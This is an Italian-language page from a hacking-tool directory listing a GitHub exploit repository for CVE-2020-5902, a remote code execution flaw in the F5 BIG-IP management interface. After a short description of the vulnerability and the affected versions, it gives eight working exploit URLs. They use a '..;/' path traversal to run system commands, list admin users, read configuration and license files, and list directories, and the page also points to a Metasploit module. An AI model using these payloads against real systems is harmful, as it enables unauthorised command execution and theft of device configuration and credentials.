Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-5902 — [CVE-2020-5902] F5 BIG-IP Esecuzione di codice in remoto (RCE) | Kitploit
Strumenti/GitHubGitHub/murataydemir/cve-2020-5902
Framework di ExploitAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubmurataydemir/cve-2020-5902

CVE-2020-5902

[CVE-2020-5902] F5 BIG-IP Esecuzione di codice in remoto (RCE)

Vedi Repository
2156 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

[CVE-2020-5902] F5 BIG-IP Interfaccia utente di gestione del traffico (TMUI) - Esecuzione di codice in remoto


Nelle versioni BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 e 11.6.1-11.6.5.1, l'interfaccia utente di gestione del traffico (TMUI), nota anche come utilità di configurazione, presenta una vulnerabilità di esecuzione di codice in remoto (RCE) in pagine non divulgate.

Questa vulnerabilità consente ad aggressori non autenticati, o a utenti autenticati, con accesso di rete all'utilità di configurazione, attraverso la porta di gestione BIG-IP e/o gli IP self, di eseguire comandi di sistema arbitrari, creare o eliminare file, disabilitare servizi e/o eseguire codice Java arbitrario. Questa vulnerabilità può portare a una compromissione completa del sistema. Anche il sistema BIG-IP in modalità Appliance è vulnerabile. Questo problema non è esposto sul piano dati; solo il piano di controllo è interessato.

root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/

L'avviso di sicurezza originale è stato pubblicato da F5 e puoi consultarlo qui
Inoltre, è disponibile un modulo metasploit per CVE-2020-5902 con valutazione Eccellente. Puoi trovare i codici Ruby del modulo metasploit per exploits/linux/http/f5_bigip_tmui_rce.rb

Scarica lo strumento